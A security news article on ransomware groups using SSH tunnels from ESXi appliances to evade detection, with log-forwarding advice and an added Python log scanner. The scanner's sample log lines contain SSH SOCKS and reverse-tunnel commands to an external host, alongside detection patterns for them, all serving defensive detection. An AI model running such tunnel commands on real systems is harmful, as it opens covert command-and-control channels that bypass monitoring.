ESXi ransomware attacks use SSH tunnels to avoid detection


Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection.

Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging native tools like SSH to create undetected SOCKS tunnels for communication with C2 servers.

The researchers reported that in many cases attackers compromised the ESXi appliances either by using administrative credentials or by exploiting a known vulnerability to bypass authentication.

Once they had gained access to the device, attackers set up the tunnel using the native SSH functionality or by deploying other common tools with similar capabilities.

The resilience of ESXi appliances makes them ideal for tunneling, providing a semi-persistent backdoor within the network.


ESXi splits its logs into multiple files by activity, which complicates forensic investigations and monitoring. Configuring log forwarding is essential to streamline monitoring and centralize event capture.

“While ESXi does support a few third-party monitoring or telemetry agents, such tools are limited in availability. As a more comprehensive and cost-effective solution, configuring syslog forwarding from the ESXi server to an external syslog server can solve the issue. This setup enables centralized monitoring of all activities within the ESXi server and serves as a means of log retention,” reads the Sygnia report.

“The following key log files are the most important ESXi telemetry files that will often assist with detecting and investigating an attack using SSH tunneling techniques on the appliance:

  • /var/log/vobd.log (VMware observer daemon log)
  • /var/log/shell.log (ESXi shell activity log)
  • /var/log/hostd.log (Host agent log)
  • /var/log/auth.log (authentication log)”

The report provided multiple examples of common activities and messages found in ESXi syslog files that might be associated with malicious activity.
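As an added example (not from the Sygnia report or the original post), a small Python scanner that applies the idea above to forwarded ESXi syslog lines: it flags SSH invoked with port-forwarding flags, the SSH service being switched on, and interactive SSH logins. The log lines are constructed samples, and the patterns are assumptions to adapt to the log formats of your own ESXi build.

```python
import re
from typing import Dict, List

# Constructed sample lines (not real captures), loosely modelled on what the
# ESXi shell.log, hostd.log and auth.log files contain. Exact formats vary by
# ESXi build, so adapt the patterns below to your own forwarded syslog data.
SAMPLE_LOGS = """\
2025-01-27T09:12:01Z shell[2097]: [root]: esxcli network firewall get
2025-01-27T09:12:44Z shell[2097]: [root]: ssh -fN -D 1080 -p 443 svc@203.0.113.10
2025-01-27T09:13:02Z shell[2097]: [root]: ssh -fN -R 8443:127.0.0.1:443 -p 443 svc@203.0.113.10
2025-01-27T09:14:10Z hostd[2048]: Event 42 : SSH access has been enabled.
2025-01-27T09:15:00Z sshd[2211]: Accepted password for root from 198.51.100.7 port 51522 ssh2
2025-01-27T09:16:00Z shell[2097]: [root]: ls /vmfs/volumes
"""

# -D opens a SOCKS proxy, -R a reverse tunnel and -L a local forward: these are
# the flags a SOCKS tunnel to a C2 server would leave behind in shell.log.
TUNNEL_FLAG_RE = re.compile(r"\bssh\b.*\s-([DRL])\s*(\S+)")
SSH_ENABLED_RE = re.compile(r"SSH access has been enabled", re.IGNORECASE)
SSH_LOGIN_RE = re.compile(r"Accepted \w+ for (\S+) from (\S+) port (\d+)")


def scan_esxi_logs(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line, in file order, with a severity
    so that tunnel commands rise above routine SSH logins in a SIEM view."""
    findings: List[Dict[str, str]] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if m := TUNNEL_FLAG_RE.search(line):
            kind, severity, detail = "ssh_tunnel", "high", f"-{m.group(1)} {m.group(2)}"
        elif SSH_ENABLED_RE.search(line):
            kind, severity, detail = "ssh_enabled", "medium", "SSH service turned on"
        elif m := SSH_LOGIN_RE.search(line):
            kind, severity, detail = "ssh_login", "info", f"{m.group(1)} from {m.group(2)}"
        else:
            continue  # nothing SSH-related on this line
        findings.append({"line": str(line_no), "kind": kind,
                         "severity": severity, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan_esxi_logs(SAMPLE_LOGS):
        print(f"[{f['severity']:6}] line {f['line']}: {f['kind']} ({f['detail']})")
```

Pointed at a syslog collector's output rather than the inline sample, the same function gives a first-pass triage list; an `ssh_tunnel` finding on an appliance nobody expects to be running SSH at all is the one to chase first.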


Pierluigi Paganini

(SecurityAffairs – hacking, ESXi ransomware attacks)